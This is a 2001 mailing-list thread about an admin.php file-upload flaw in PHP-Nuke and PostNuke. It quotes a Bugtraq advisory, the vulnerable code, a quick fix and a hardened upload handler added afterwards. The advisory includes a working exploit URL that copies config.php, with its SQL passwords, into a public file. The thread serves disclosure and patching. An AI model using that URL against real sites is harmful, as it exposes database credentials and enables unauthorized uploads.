
[linux] PHP Bug



I suppose you all read Bugtraq ...
but did you know that

http://127.0.0.1/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

http://127.0.0.1/images/hacked.txt and you will see config.php that as

And linuxbe.org? Well, no, they know how to configure an Apache, unlike
me :) ....


Dominique

Alternative "quickfix"; change
"if($upload) {" to
"if (($upload) && ($admintest)) {"

This at least works for PostNuke 0.62. I have not tested the latest PostNuke
0.63 - it may be vulnerable as well...

And btw; if you're not going to use the filemanager, disallow write access
for the webuser (usually nobody or www) to all files/directories below
webroot.


Magnus Skjegstad

----- Original Message -----
From: <supergate@twlc.net>
To: "bugtraq" <bugtraq@securityfocus.com>
Sent: Monday, September 24, 2001 9:31 PM
Subject: twlc advisory: all versions of php nuke are vulnerable...


> Explanation
> Do you need sql password?
>
>
> http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
>
> the admin 'login' page will be prompted, just go to
> http://www.server.net/images/hacked.txt and you will see config.php, which
> as everyone knows contains the sql passwords, you can even upload files... i
> leave you the 'fun' of finding all the ways to use it... and try not to be a
> SCRIPT KIDDIE, we wrote this advisory to help those who run php nuke and NOT
> TO LET YOU HAVE FUN.
>
> let me explain the bug to you... admin.php contains this routine:
>
> $basedir = dirname($SCRIPT_FILENAME);
> $textrows = 20;
> $textcols = 85;
> $udir = dirname($PHP_SELF);
> if(!$wdir) $wdir="/";
> if($cancel) $op="FileManager";
> if($upload) {
>     copy($userfile,$basedir.$wdir.$userfile_name);
>     $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
>     // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao
>     //include("header.php");
>     //GraphicAdmin($hlpfile);
>     //html_header();
>     //displaydir();
>     $wdir2="/";
>     chdir($basedir . $wdir2);
>     //CloseTable();
>     //include("footer.php");
>     Header("Location: admin.php?op=FileManager");
>     exit;
> }
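
The quoted routine copies whatever path arrives in $userfile, and with register_globals enabled that value can come straight from the query string. A hardened form of that branch follows as an added example; it is not part of the original thread or of PHP-Nuke/PostNuke, the function names are hypothetical, and `$admintest` is assumed to be set only by the application's own admin check:

```php
<?php
// Added example, not PHP-Nuke/PostNuke code. Function names are hypothetical.
// Assumption: $admintest comes from the application's own admin check.

/** Resolve $wdir below $basedir; return null if it escapes or is missing. */
function resolve_upload_dir(string $basedir, string $wdir): ?string
{
    $base = realpath($basedir);
    $dir  = realpath($basedir . '/' . $wdir);
    if ($base === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($dir !== $base && strpos($dir, $prefix) !== 0) {
        return null;                    // e.g. a wdir containing "../"
    }
    return $dir;
}

/**
 * Store one upload. $file is an entry of $_FILES, which PHP fills only from
 * a multipart POST body, so query-string values cannot stand in for it.
 */
function handle_upload(bool $admintest, array $file, string $basedir, string $wdir): bool
{
    if (!$admintest) {
        return false;                   // same gate as the quick fix
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return false;
    }
    // A path like "config.php" was never received as an upload: rejected.
    if (!is_uploaded_file($file['tmp_name'] ?? '')) {
        return false;
    }
    $dir = resolve_upload_dir($basedir, $wdir);
    $name = basename($file['name'] ?? '');
    if ($dir === null || $name === '' || $name[0] === '.') {
        return false;
    }
    return move_uploaded_file($file['tmp_name'], $dir . DIRECTORY_SEPARATOR . $name);
}

// Call site replacing the quoted "if($upload) { copy(...) }" branch:
// if (isset($_FILES['userfile'])) {
//     handle_upload((bool) $admintest, $_FILES['userfile'], __DIR__, (string) ($_POST['wdir'] ?? '/'));
// }
```

The write-permission advice in the reply above still applies: if the file manager is unused, the web user should not be able to write below the webroot at all.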


